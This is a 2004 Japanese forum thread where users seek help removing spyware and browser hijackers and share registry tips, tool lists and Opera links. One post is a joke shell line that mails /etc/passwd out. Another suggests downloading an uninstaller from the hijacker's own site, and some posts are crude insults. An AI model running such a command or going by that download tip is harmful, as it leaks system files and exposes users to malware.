  http:// prdownloads.sourceforge.net/jlpmoz/FirefoxSetup-0.9.2-jaJP.exe?download

882 :ひよこ名無しさん:04/07/14 20:30 ID:???
DonutPからOperaに乗り換えようかな・・・

883 :Opera 最新版 7.52公式?日本語版出たぞ:04/07/14 20:40 ID:???
下記のアドレスからダウンロードできる。ふつうに使うだけならjavaなしを推奨。
インストーラや言語ファイルもあらかじめ日本語になっている。言語ファイル
を別にダウンロードする必要もなく簡単。

javaあり ftp://ftp.opera.com/pub/opera/win/752/ja/java/ow32jaja752j.exe
javaなし ftp://ftp.opera.com/pub/opera/win/752/ja/std/ow32jaja752.exe

>>403のミラーサイトにあるのと同一ファイル
 http://public.planetmirror.com/pub/opera/win/752/ja/

この日本語版、Opera社のサイトに置いてあるんだから、公式版なんだろうが、
本社の玄関 http://www.opera.com/ から入ってもまだ見当たらない。

884 :ひよこ名無しさん:04/07/14 21:58 ID:kAutNyjd
おい、このスレどーなってんだ。
vbsじゃねーウイルスに感染しやがるぞ。何なんだ一体。
http://aa5.2ch.net/test/read.cgi/aasaloon/1089717587/

このスレの住人はこれの仕組み分からない?

885 :ひよこ名無しさん:04/07/14 22:02 ID:???
>>884
いつものとおりノートンがアフォなだけ。

886 :ひよこ名無しさん:04/07/14 22:04 ID:kAutNyjd
vbsじゃないのに誤作動するんだ?

887 :ひよこ名無しさん:04/07/14 22:15 ID:???
>>884
CGIに対してそのパラメータを渡すとパスワードが盗めることがあるらしい。
今どきそんな古典的なやり方は通用しないと思うけど。

888 :ひよこ名無しさん:04/07/14 22:16 ID:???
日テレのアナウンサーのお漏らし動画ってどこのサイトにおちてるんでしょうか?
上戸あやも一緒にでてるらしいんですが。

889 :ひよこ名無しさん:04/07/14 22:19 ID:???
>>888
スレ違い、板違い
帰れ!

890 :ひよこ名無しさん :04/07/14 22:32 ID:rhk8/ZDu
ツールバーに
Search Toolber
というものが入ってしまいました
どうすればいいのでしょうか?

891 :ひよこ名無しさん:04/07/14 22:33 ID:???
>>890
消せば?

892 :ひよこ名無しさん:04/07/14 22:41 ID:???
>>891
消してもすぐに復活するんです

893 :ひよこ名無しさん:04/07/14 22:41 ID:???
>>890
とりあえずテンプレを読もうね。

894 :ひよこ名無しさん:04/07/14 22:42 ID:???
>>1から順番に見もしない糞厨房がいるスレはここですか?

895 :ひよこ名無しさん:04/07/14 22:43 ID:???
>>893
そんなめんどうなことしたくないんです

896 :ひよこ名無しさん:04/07/14 22:44 ID:???
>>895
少しも努力しないヤシに教えるほうがもっと面倒。

897 :ひよこ名無しさん:04/07/14 22:50 ID:???
>>896
だったらわざわざレスしてほしくないんですが

898 :ひよこ名無しさん:04/07/14 22:52 ID:tFzNCZmq
てすと
どないだ?

899 :ひよこ名無しさん:04/07/14 22:59 ID:???
>>897
邪魔

900 :ひよこ名無しさん:04/07/14 23:09 ID:???
>873
なにか別のトリガーが、巧妙に仕組まれているような気がするのですが。

Home Search Assistent がこれだけ蔓延して悪質なのも、コントロール
パネルの「ファイルの削除」を実行することがトリガーになっていると
いう、巧みな仕掛けによるものですし、なにか普段使うファイルに
トリガーが仕組まれているのではないかと思うのですが、
違いますかね。

901 :ひよこ名無しさん:04/07/14 23:11 ID:???
俺もみない

902 :ひよこ名無しさん:04/07/14 23:34 ID:???
>>900
自分もそう思った。再発するということが実際に起きるのなら、
1回だけ読み込まれるだけじゃそれはありえない。
再発させるための何らかのトリガーがかならず仕掛けられているはず。
ただどういった条件でon-line.exeが再び実行されるのかが、分からない。
on-line.exeに関係するレジストリやwin.iniの情報があれば、
その仕掛けが解明できて、改ざんされたレジストリまで完璧に治療するような、
治療法が見つかるかもしれないのだが、そういった情報がないのが悔やまれるところ。

現在の消し方では予想だが、レジストリは改ざんされたままだろう。

903 :ひよこ名無しさん:04/07/14 23:54 ID:???
なるほど。

904 :840=900:04/07/14 23:55 ID:???
>902
同意してくれる人がいたー。
840にも書きましたが、自分も同じタイプのに感染してリカバリーしま
した。その過程で、 エンコードしてつきとめた元凶ファイルを
削除したはずなのに再発を繰り返したので、
どこかにトリガーがあるはずだ!とは確信していました。
それは突き止められず終いでしたが、755氏の探索結果が
もっと早く報告されてれば、うちのシステムも治せたんだろうな
と思うと……orz

>902さん
どういう情報が出れば、そのトリガーについて
解析できるものなんですかね。

905 :755:04/07/15 00:05 ID:t6Eofj9V
>>873
私も自分が感染するまでは同じ考えだったのですが、自分で感染して何度駆除しても
しばらく経過(早いときは数分後、遅いときで半日後位でどのタイミングか不明)すると
DLLファイルと、SP.htmlが復活するのです。
それと、昨日CHMファイルを削除してからはまだ再発していない事もあり、
他の方も書かれていますが、スパイウエアを組み込まれた時点でCHMファイルから
on-line.exeを発動させる仕組みが何か組み込まれていると思います。

但し、この件も確証が無いので、もうしばらく観察して再発が無ければCHMファイルを
戻してどうなるか確認してみようと思っています。
簡単な操作でファイルの展開・実行をトレースしてくれるプログラム無いですかね

CHMの実験をされているのですか、私はCHMを展開して実行する仕組みが分からないので
新たな発見があったら教えて下さい。

>>900
私も何かトリガーが巧妙に仕込まれていると思っています。
そうでないと再発は説明できませんから

>>902
発症時にon-line.exeやCHMやらレジストリ内を検索しましたが手がかりはありませんでした。
出来れば、発症前と後でレジストリの比較をすれば良いのですが、もう感染しているので
出来ません。誰か人柱になる人居ないかな。

再発してないので、見た目は駆除されている感じですが、実際は他の仕掛けが裏で蠢いている
と思います。現時点では下手に駆除するよりも再インストールが最良の方法じゃないのか。

906 :ひよこ名無しさん:04/07/15 00:07 ID:???
>>900
失礼しました。現在の問題点は on-line.exe 発動のトリガではなく,
平常時における様々な障害のそれぞれのトリガなのですね。

話は変わるけど EVEREST home edition いいですね。
ttp://www.lavalys.com/products.php?lang=en
プロセスの状態はもちろん,他の色々な情報も見られたり。

907 :755:04/07/15 00:15 ID:t6Eofj9V
>>904
自分自身が感染したのが、つい最近なんで許してね。
でも、現時点では発動元のファイルを削除して単に再発を抑えている
だけなので、システムの再構築は最良の選択だったと思いますよ。
見えない所で何をされているのか分からないのは怖いです。

908 :ひよこ名無しさん:04/07/15 00:21 ID:???
>>905
.chmは展開する必要がないんですよ。
ヘルプファイルにも使われてるように複数のhtmlや画像やその他のファイルを
一つのファイルに出来るだけで。
動作はhtmlとまったく同じだけど、ユーザは中の構成が見えない。

909 :ひよこ名無しさん:04/07/15 00:23 ID:???
MSから重要な更新、いくつか来たね。
各々の判断で更新を。

910 :755:04/07/15 00:25 ID:t6Eofj9V
>>908
そうでしたか、もう少し勉強してきます。

911 :ひよこ名無しさん:04/07/15 00:50 ID:???
アフォは何やっても(アフォ

912 :ひよこ名無しさん:04/07/15 01:07 ID:???
やっかいなものが楽して除去できれば
それはやっかいなものではない。やっかいだから困ってるんだろ?
だったら相応の努力と以下略

913 :ひよこ名無しさん:04/07/15 02:02 ID:???
>>910
被害対策の755氏の力作レポート拝見。cheshire-cat氏も大いに内容
評価されてましたね。禿乙です。

914 :ひよこ名無しさん:04/07/15 02:09 ID:???
>>913
エロデブ自慢されてもね。

915 :ひよこ名無しさん:04/07/15 02:45 ID:???
>>914
お前は何も自慢するものがないわけだが。

916 :ひよこ名無しさん:04/07/15 03:08 ID:???
ないと言った方がまだカッコいいよ。

917 :ひよこ名無しさん:04/07/15 03:14 ID:???
>>916
未熟なケツマンコは自慢になるよ!

918 :ひよこ名無しさん:04/07/15 03:22 ID:???
>>916
ソーデモナイヨ

919 :ひよこ名無しさん:04/07/15 03:24 ID:???
>755さん,レジストリの中を Q330995.exe で検索して見て頂けますか?
それから
 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units
の中も,あやしいブランチがないかどうかチェックですね。
HijackThis も同じ所を見てるはずだとは思うんですが。。。

920 :ひよこ名無しさん:04/07/15 03:40 ID:???
>>913
どこで見られる?
掲示板には無さそうだが。

921 :755:04/07/15 04:03 ID:t6Eofj9V
>>919
レジスト内で、Q330995.exeを検索してみましたが何も引っ掛かりませんでした。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Unitsも
見てみましたが、見当たりませんでした。
ただ、私はレジストリの項目には詳しくないので、見逃している可能性も有ります。

また、何か有りましたらご質問ください。

922 :ひよこ名無しさん:04/07/15 04:48 ID:???
>>920
ttp://higaitaisaku.web.infoseek.co.jp/cgi-bin/cbbs.cgi?mode=alk&no=2#1

923 :ひよこ名無しさん:04/07/15 08:05 ID:???
>>9のヤツにかかった
レジストリ値は削除できたんだけど、ソースみたら2行目は
<base href="res://%43%3a%5c%57%49%4e%44%4f%57%53%5c%53%79%73%74%65%6d%33%32%5c%6c%62%68%65%6e%2e%64%6c%6c/">
ってなってて、>>9で言われてる「 <!-- saved from url=res://〜」って文字列がでてこない
とりあえず上記のでDecodeしてみて、出た値が「<base href="res://C:\WINDOWS\System32\lbhen.dll/">」
なんだけどdllファイルが見つかりません
どうしたらいいですか?


って書いてる途中にlとi読み間違えてたことに気づいた俺のIQが知りたい

924 :ひよこ名無しさん:04/07/15 08:13 ID:???
>>923
ttp://homepage2.nifty.com/winfaq/wxp/trouble.html#871

925 :847:04/07/15 09:15 ID:m48Ru8HY
>> 877 878
ありがとうございました。
これで安心して寝れます。

926 :ひよこ名無しさん:04/07/15 09:22 ID:???
>>925
サイトを見ただけでメールアドレスは分らない。無料会員とかに入会でメールアドレスを教えない限り。
ってもう寝たか

927 :IEに最大緊急のセキュ穴…って誰も驚かんか:04/07/15 12:44 ID:???
おととい出たWindowsUpdateやってもだめぽ…
------------------------------------------------------------
IE 5.01〜6に、最も危険でパッチ未公開の4種類の脆弱性が発見される
http://internet.watch.impress.co.jp/cda/news/2004/07/14/3902.html
…これらの脆弱性を修正するパッチは7月14日現在、マイクロソフトより
提供されていない。このため、SecuniaではActiveScriptやそのほかの
スクリプト機能をすべて無効にするか、★ほかのWebブラウザを利用★
することを推奨している。
-------------------------------------------------------------


928 :IEに最大緊急のセキュ穴…って誰も驚かんか:04/07/15 13:35 ID:???
おととい出たWindowsUpdateやってもだめぽ…
------------------------------------------------------------
IE 5.01〜6に、最も危険でパッチ未公開の4種類の脆弱性が発見される
http://internet.watch.impress.co.jp/cda/news/2004/07/14/3902.html
…これらの脆弱性を修正するパッチは7月14日現在、マイクロソフトより
提供されていない。このため、SecuniaではActiveScriptやそのほかの
スクリプト機能をすべて無効にするか、★ほかのWebブラウザを利用★
することを推奨している。
-------------------------------------------------------------

929 :2ch有効活用 ◆NEVADAnVGU :04/07/15 15:28 ID:KRzZ7Dpi
IEはつかわね。

930 :ひよこ名無しさん:04/07/15 15:46 ID:???
何使ってんの?

931 :ひよこ名無しさん:04/07/15 15:50 ID:???
↓ここでOperaの宣伝↓

932 :ひよこ名無しさん:04/07/15 15:54 ID:???
                    _ , ― 、
                  ,−'  `      ̄ヽ_
                 ,'            ヽ
                (   `ー'ー'ヽ`ー'ー'ヽ  )        
               (  ノ ''''''   '''''':::::::ヽ  ) OPERA
               ( . )(●),   、(●)、.:( ) + 最高
               ( )   ,,ノ(、_, )ヽ、,, .::::( )   
               . ヽ )   `-=ニ=- ' .:::::::|ノ  +
                  \  `ニニ´  .:::::/      +
               ,,.....イ.ヽヽ、ニ__ ーーノ゙-、.
               :   |  '; \_____ ノ.| ヽ i

933 :ひよこ名無しさん:04/07/15 16:02 ID:???
>>932
幸せそうだな

934 :ひよこ名無しさん:04/07/15 16:35 ID:???
Opera v7.51のインストールと日本語化の手順

■v7.23以前をインストールしている場合は「アプリケーションの(プログラム)の
 追加と削除」からアンインストール。(7.5からは上書きインストで問題ない)

■Opera本家から本体をダウンロード
  Opera7.51(最新版)http://www.opera.com/download/?lng=en&ver=7.51
 いちばん下の赤い DOWNLOAD ボタンを押す。

■Opera本家から言語ファイルをダウンロード
  http://my.opera.com/community/customize/langs/
 Select Opera Version and Language ←バージョンと言語の選択ボックス
 ▼ボタンを押してリストを開く→Windows-7.50 Japnese(1) をそれぞれ選択→
 地球儀アイコンをクリック→ja_74818.lngという日本語用言語ファイルが選択される→
 Opera.exeが存在するフォルダにダウンロードする。

■Operaに日本語言語ファイルを設定
  Operaを起動→OperaのメニューのTools→Preferences→ Languages→
 User Interface Languageでchooseボタンを押す→ダウンロードしたja_74818.lng
 を選択→OK
これでメニューは日本語で表示されるはず。日本語優先の設定もしておこう。
 Tools→設定→言語→「ウェブページの閲覧で優先する言語」で「追加」→
 japanese(ja)選択→「上へ移動」ボタンで一番上にする→「エンコード情報が不足
 しているページに使用するエンコード方法」→shift_jisを選択→適用→OK

935 :ひよこ名無しさん:04/07/15 16:46 ID:???
オペラでブラウザ乗っ取りのスパイウェアにやられますた・・・

936 :ひよこ名無しさん:04/07/15 17:00 ID:SwqHWCBf
http://qma2ch.hp.infoseek.co.jp/cgi-bin/img-box/img20040614030433.jpg

これ、開いちゃって何個もサイトがでてきたんですが、
どうすればいいでしょうか

937 :ひよこ名無しさん:04/07/15 17:01 ID:???
このスレをオペラ仲間の休憩所にしょう。

938 :ひよこ名無しさん:04/07/15 17:09 ID:SwqHWCBf
プログラムファイルの中にあるファイルの中に、2003年3月31日に購入したXPなのに、作成日時が2001年とか2002年とかいうのがあります。


939 :ひよこ名無しさん:04/07/15 17:12 ID:???
>>936
直リンするなデブ!氏ね

940 :ひよこ名無しさん:04/07/15 17:19 ID:???
>>938
XPくらいになると発売する何年も前から開発してる。

941 :ひよこ名無しさん:04/07/15 17:37 ID:???
>>938
あっ、そう。

942 :936:04/07/15 18:50 ID:???
>>939
教えられるだけの知識がないなら黙っててください。
( ゚д゚)、ペッ 

943 :ひよこ名無しさん:04/07/15 19:11 ID:???
>>942
もう見れないのか?

944 :936:04/07/15 19:16 ID:???
                 ┌─┐
                 |も.|
                 |う |
                 │来│
                 │ね│
                 │え .|
                 │よ .|
      バカ    ゴルァ   │ !!.│
                 └─┤    プンプン
    ヽ(`Д´)ノ ヽ(`Д´)ノ  (`Д´)ノ    ( `Д)
    | ̄ ̄ ̄|─| ̄ ̄ ̄|─| ̄ ̄ ̄|─□( ヽ┐U
〜 〜  ̄◎ ̄  . ̄◎ ̄   ̄◎ ̄   ◎−>┘◎

945 :ひよこ名無しさん:04/07/15 19:17 ID:???
>>942
あえて釣られてあげる。
テンプレ読む力がないのなら、もうここへは来なくいいよ。
最近のスパイウェアはツール使って、「はいお終い」なんてのはないから、
教えても理解力がなければ決して治療はできない。
君のPCの状態を危険なアドレス貼っただけでここにいる全ての人に
理解してもらえたっと思ったら大間違い。

946 :ひよこ名無しさん:04/07/15 19:23 ID:???
踏んでも面白くないから、どうせならもっと危険なの貼れ。

947 :ひよこ名無しさん:04/07/15 19:26 ID:???
cat /etc/passwd | mail nobody


948 :ひよこ名無しさん:04/07/15 19:35 ID:eetOxTAa
初心者丸出しの質問で悪いんですけど…

ADSLであっても、国際電話やQ2とつながるんですか?

949 :ひよこ名無しさん:04/07/15 19:36 ID:???
つながらね。

950 :ひよこ名無しさん:04/07/15 19:36 ID:???
地雷師さん降臨キボンヌ。

951 :ひよこ名無しさん:04/07/15 19:36 ID:???
>>948
つながりません。
勝手に繋ぎに逝こうとするのか、お前のPC?(・∀・)ニヤニヤ

952 :ひよこ名無しさん:04/07/15 19:39 ID:???
地雷だけじゃなく
初心者よけの魔除けまで貼られるようになったか
いよいよ夏本番か?

953 :ひよこ名無しさん:04/07/15 19:39 ID:???
>>948
携帯か家の電話からかければ繋がる

954 :ひよこ名無しさん:04/07/15 19:42 ID:???
地雷師とか言ってる奴は単にクレクレ君だろ?
で、他の板とか行って貼りたいだけちゃうんかと。

955 :ひよこ名無しさん:04/07/15 19:46 ID:???
勇気が・・スレに行けばスグ手に入るじゃん。

956 :ひよこ名無しさん:04/07/15 20:03 ID:???
ネットしてる時に突然xxxって書いてある窓がでて突然接続が切断されるんですがどうしたらいいでしょう?

957 :ひよこ名無しさん:04/07/15 20:04 ID:EByUs9Xx
ネットしてる時に突然xxxって書いてある窓がでて突然接続が切断されます しかもデスクトップに残って消えません
AD-awareでスキャンしても消えません  どうすればいいでしょうか?



958 :ひよこ名無しさん:04/07/15 20:04 ID:???
>>956-957
失せろ、ケツゲ。

959 :ひよこ名無しさん:04/07/15 20:04 ID:???
956はミスです すいません

960 :ひよこ名無しさん:04/07/15 20:06 ID:???
>>956-957
テンプレやれって言われたのに、なんでイキナリ質問してんの?

961 :948 :04/07/15 20:35 ID:eetOxTAa
どーもでした!


962 :957:04/07/15 20:48 ID:EByUs9Xx
すいません やっても出来ませんでした

963 :ひよこ名無しさん:04/07/15 21:08 ID:???
宿題しろよー

964 :ひよこ名無しさん:04/07/15 21:08 ID:GcleZODU
ホームページが勝手に変えられて、直しても再起動したら戻ってしまいます!
このページです
http://supacoopa.directwebsearch.net/index.html
各種スパイウェア除去ツールを使ってもどうにもなりません!助けてください!

965 :ひよこ名無しさん:04/07/15 21:17 ID:???
>>964
エロサイトスレのテンプレやれ。

直リンするなよ。クズ。

966 :ひよこ名無しさん:04/07/15 21:34 ID:???
そろそろ次スレの時期です。以下の理由でタイトル変更を提案しますが、どうでしょうか。

1.「…助けてください!」が、テンプレ実行しない相談者を誘発していそう。
2.「エロサイト…」を見て自分とは関係無いと判断するのか何か、
  まず総合質問に書き込んでそれからここへ誘導される相談者が多すぎる。

たとえば、こんなのどうでしょうか。

A) エロサイト見たら…スパイウェア関連スレッド 123
B) 突然変なページが…スパイウェア関連スレッド 123

967 :ひよこ名無しさん:04/07/15 21:37 ID:???
タ・タ・タイトルを変えるのか・・・・・・・・・・・

968 :966:04/07/15 21:42 ID:???
明らかにスパイウェア被害なのに、総質に書き込んで、
むこうからこっちへ誘導されたら、テンプレも読まずに、
情報不足な質問文をコピペする相談者が、あまりに多いから、
タイトル変えたら改善されないかなぁと思って

969 :ひよこ名無しさん:04/07/15 21:43 ID:???
タイトルはまんまでいこうぜ・・・・・・

970 :ひよこ名無しさん:04/07/15 21:48 ID:???
タイトルはそのままの方が嬉しい。
伝統は守っていきたいな……
色んな意味で厨なヤツはスルーすれば無問題。

971 :人科:04/07/15 21:50 ID:4O+/Gp15
aboutblankにやられ ADアワー最新版 スパイぼっと シュレッダー
IEの削除などやりましたが どーにもなりません

972 :ひよこ名無しさん:04/07/15 21:50 ID:???
取り合えずまんまでいいに一票。

「スパイウェア関連スレッド」はちとまずい。
セキュ板のスパイウェア予防駆除をパクったと思われるw

973 :ひよこ名無しさん:04/07/15 21:54 ID:???
>>971
>>843を参照。

974 :966:04/07/15 21:54 ID:???
じゃあ今までどおりのタイトルで…
でも、総質から自分書込みをそのままコピペする相談者に対しては
何か対策が必要だと思う。

975 :ひよこ名無しさん:04/07/15 21:55 ID:???
>>971
テンプレ6の>>7>>755氏の治療経過などを参考にしてみてください。

about:blank対処法暫定ページ(本家のリンクです)
ttp://higaitaisaku.web.infoseek.co.jp/removeaboutblank.html

976 :ひよこ名無しさん:04/07/15 21:59 ID:???
>>975 (訂正)
テンプレ6は>>9でした。
>>843のやつはabout:blankを削除したあとにやらないと、
たぶん効果がありません。(再発防止治療)

977 :ひよこ名無しさん:04/07/15 22:02 ID:???
???

978 :ひよこ名無しさん:04/07/15 23:09 ID:???
このスレの>>1は大馬鹿でテンプレも貼らずにスレ立て逃げだったが。

979 :936:04/07/15 23:48 ID:SwqHWCBf
>>944
>>942
偽者です


980 :テンプレ修正 (>>6の最新):04/07/15 23:50 ID:???
《ブラウザハイジャッカーと戦うときの必須ツール》
レジストリのスキャンと修復ツール Hijackthis
 http://higaitaisaku.web.infoseek.co.jp/HijackThis.exe 
日本語解説 http://higaitaisaku.web.infoseek.co.jp/hijackthis.html (詳しい)
入門チュートリアル http://haiiro.info/my/text/template.html#5 (簡易版)

《アンチスパイソフト》
■CWShredder CoolWebSearch専用駆除ソフト 更新終了
  本家 ttp://www.spywareinfo.com/~merijn/downloads.html
■Ad-aware 6.1 スキャン、駆除 非常駐(有料版は常駐監視機能あり)
  本家 ttp://www.lavasoftusa.com/ 更新:高 
  オリジナルの使用法 http://higaitaisaku.web.infoseek.co.jp/adaware.html
  日本語化使用法 http://www.dream-seed.com/server/spy.html 
■Spybot Search&Destroy 1.3 常駐機能あり・スキャン、削除、予防 更新:低
  本家 ttp://www.safer-networking.org/ 更新:低 日本語対応済み
  1.3新機能対応使用法 http://higaitaisaku.web.infoseek.co.jp/spybot2.html
 -----3大定番は必ずインストールして、最新版にアップデートしておこう------

■SpyywareBlaster 3.2 予防 ☆更新頻度:中
■SpywareGuard 2.2.0 常駐・予防 ☆更新頻度:低
■MRU-Blaster 1.5 各種履歴キャッシュ・クッキー削除。常駐 頻度:低
 以上3種類本家 ttp://www.javacoolsoftware.com/index.html
■各種フリーウェア日本語化パッチ配布所(Ad-aware 6.0 Build181 日本語化ツール
 SpywareBlaster 日本語化、SpywareGuard 日本語ヘルプ など)
 http://bdc.s15.xrea.com/index.php?option=com_remository&Itemid=59&func=selectfolder&filecatid=1
■IE-SPYAD  IEの制限ゾーンに危険サイトを一括登録  頻度:高
 本家 ttps://netfiles.uiuc.edu/ehowes/www/resource.htm
 IE-SPYAD導入の手引き(日本語解説ページ)
 http://www.geocities.jp/iespyad_japanese_manual/index.html
 専用スレ http://pc5.2ch.net/test/read.cgi/sec/1076041687/

981 :ひよこ名無しさん:04/07/15 23:53 ID:???
>>966のBの方がいいな。感染するのはエロサイトだけじゃないからね。

スパイウェア総合スレッド辺りにしてIEが書き換えられるのを
巧く表した説明が少し加わってるとベスト。


982 :テンプレ修正 (>>7の最新):04/07/15 23:57 ID:???
《その他リンク集》
■ウィルス関係はこちら↓
 ウィルス情報&質問 総合スレッド☆Part22
 http://pc5.2ch.net/test/read.cgi/sec/1089171169/
■その他セキュリティ関係の質問は↓
 セキュリティ初心者質問スレッドpart44
 http://pc5.2ch.net/test/read.cgi/sec/1088249907/
■アダルトサイト被害対策の部屋
 http://higaitaisaku.web.infoseek.co.jp/
 定番老舗サイト。Hijackthis、その他ツールの使い方が詳しい。質問掲示板あり
■架空請求、ダイヤルQ2、国際電話、罠サイトなどのトラブルはここらで相談。
【Mail・葉書】総合スレッドPartX【架空請求】
http://that3.2ch.net/test/read.cgi/bouhan/1089902752/
  アダルトサイト対策の部屋
   http://www002.upp.so-net.ne.jp/dalk/higai24.html
  「被害対策の部屋」とは別サイト。有料エロサイト関係のトラブル対策
■国際電話・ダイヤルQ2関連
  http://www.ntt-east.co.jp/q2/ NTT東日本 ダイヤルQ2サービス
  http://www.ntt-west.co.jp/q2/ NTT西日本 ダイヤルQ2サービス
   ダイヤルQ2接続チェックプログラムもここからダウンロードできます。
 http://www.emurasoft.com/jp/chintcal/index.htm      No! 国際電話
 http://mitsu98.fc2web.com/bbs/index2.html         Dial Saver
 http://www.kddi.com/topics/atx/image.html         ダイヤルアップチェッカー
■バナー・ブラクラ対策
 http://homepage3.nifty.com/hayazo/myprg.html     ClosePopup
 http://www.proxomitron.org/                  Proxomitron(公式サイト)
 http://www.pluto.dti.ne.jp/~tengu/proxomitron/       Proxomitron(日本語解説)
 http://pc5.2ch.net/test/read.cgi/win/1084124599/l50  Proxomitron(Windows板)
 http://pc5.2ch.net/test/read.cgi/software/1060792740/l50  Proxomitron(ソフトウェア板)


983 :ひよこ名無しさん:04/07/16 00:06 ID:???
てs

984 :755:04/07/16 00:07 ID:XRNV/Spe
まだ、こちらに書いてなかったですが、
about:blank search for…の再発の原因と思われるon-line.exeを隠匿しているファイルを
Windows標準の機能で探す方法を見つけましたので書いておきます。

方法はいたって簡単、
Windowsに標準で装備している「ファイルとフォルダーの検索」を使います。
やり方は、含まれる文字列の所にon-line.exeと打ち込んで検索するだけです

ファイル数が多いと検索に時間が掛かるので、適当に最高ファイルサイズを指定して
やると、早く検索が終わります。

985 :957:04/07/16 00:18 ID:hKlwRXpj
テンプレの事をしても状況が変わらないんですが・・・すいません

986 :ひよこ名無しさん:04/07/16 00:21 ID:???
>>985
そう言って本当に全部やったヤシは1%以下。

987 :957:04/07/16 00:29 ID:hKlwRXpj
>>986
本当に全部試した上で解決しなかったので言っているんですが

988 :ひよこ名無しさん:04/07/16 00:29 ID:???
>>985
テンプレ>>10はやったのか?

989 :ひよこ名無しさん:04/07/16 00:29 ID:???
>>985
自分のやったこともう少し詳しく書いてみ

>>964
勇気があるなら
ttp://supacoopa.directwebsearch.net/uninstall.htm
からダウンロード。
ただし、何の保障もしないけどね。

990 :ひよこ名無しさん:04/07/16 00:32 ID:???
(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク

991 :ひよこ名無しさん:04/07/16 00:36 ID:???
        まもなくここは 乂1000取り合戦場乂 となります。

      \∧_ヘ     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ,,、,、,,, / \〇ノゝ∩ < 1000取り合戦、いくぞゴルァ!!       ,,、,、,,,
    /三√ ゚Д゚) /   \____________  ,,、,、,,,
     /三/| ゚U゚|\      ,,、,、,,,                       ,,、,、,,,
 ,,、,、,,, U (:::::::::::)  ,,、,、,,,         \オーーーーーーーッ!!/
      //三/|三|\     ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ∪  ∪       (    )    (     )   (    )    )
 ,,、,、,,,       ,,、,、,,,  ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ,,、,、,,,       (    )    (    )    (    )    (    )

992 :ひよこ名無しさん:04/07/16 00:40 ID:???
       ,,、,、,,,       ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\   \∧_ヘ
,,、,、,,,             俺一人で行くか…… >   / \〇ノゝ  ,,、,、,,,
           ,,、,、,,,  ________/   /三√´д`)
                                /三/| ゚U゚| \
   ,,、,、,,,    ,,、,、,,,      ,,、,、,,,         U (:::::::::::)∪  ,,、,、,,,
,,,,,,,,    ,,,,,,,,,,,,,    ,,,,,               //三/|三|\ トボトボ
,,,,,    ∧_∧ うまいモナー,,,,,   、 ,,,,,,     ∪  ∪
 ,,,   ( ´∀`)___,,,,___ ,, ∧_∧ ゲンキニ シテルカナ・・・___,,
  / ̄ ( つ日ヽ   ∧_∧    (    )               /
/    (__))   (´∀` )   (    )    ∧_∧∧_∧ / マターリモナー
 ∧_∧∧_∧ドーゾ (日ノ )  | | |    ( ´∀`) ´∀`)
 ( ´∀`) ´∀`)    ((__)  ,(_(_) (○)⊂   ) つ日⊂ ) モーナー
―(つ⊂  ) つ⊂ )―――――――――――ヽ|〃(⌒)(⌒) (⌒)(⌒)
   (⌒)(⌒) (⌒)(⌒)グーグー

993 :957:04/07/16 00:44 ID:igeZxljx
ログはどこに貼り付けるんでしょうか?

994 :ひよこ名無しさん:04/07/16 00:47 ID:???
>>993
ここに貼ってもいいんじゃねぇの?

995 :957:04/07/16 00:47 ID:igeZxljx
>>989
テンプレ>>5以下の>>10以外は全て試しました

996 :957:04/07/16 00:50 ID:igeZxljx
>>994
ここに貼っても良いんでしょうか? もの凄く長いんですが・・・

997 :ひよこ名無しさん:04/07/16 00:52 ID:???
>>996
過去ログちっとも読んでないんだな。

998 :ひよこ名無しさん:04/07/16 00:54 ID:???
>>996
分割して貼るんだ。

999 :わたしはメーテル:04/07/16 00:56 ID:???
     }                     }
     }                    /  o ゚.  
.     〉'' ,、,,,__               ノ} 。 :∴   
     i ムツッ=,ニ_゙゙"''‐- 、、,,,__,,..,,,.. -‐'''"/ 。 X,,    999はいただくわ
     l {{ ハ` `゚'~`  ,‐-,ニ二ヾ,,_ヽ   /   i'(_,.l\
      〉、`ハ    }  ` `゚'゙゙” }}'゙   ,'    ti=ti、iiヽ
.     / ハヽハ  ノ       //    {      ゙ヾヽ}
    / /ハヽヘ  `、_   (Cノ/  /  ハ      ノラ
   / // } Y゙\ `   Cノイ  /    \    〆'
. / / / /  ,ゞ,, `-‐ ''´〆⌒ヽ{  ,' ハ   \
 ;''"''ヾノ /_,/  `'' ァ''7/     \l l ヽヾ   \
 ゞ..,,.'' ̄//    ''´ //       \  \ヾ   \

1000 :ひよこ名無しさん:04/07/16 00:56 ID:???
1000

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

316 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)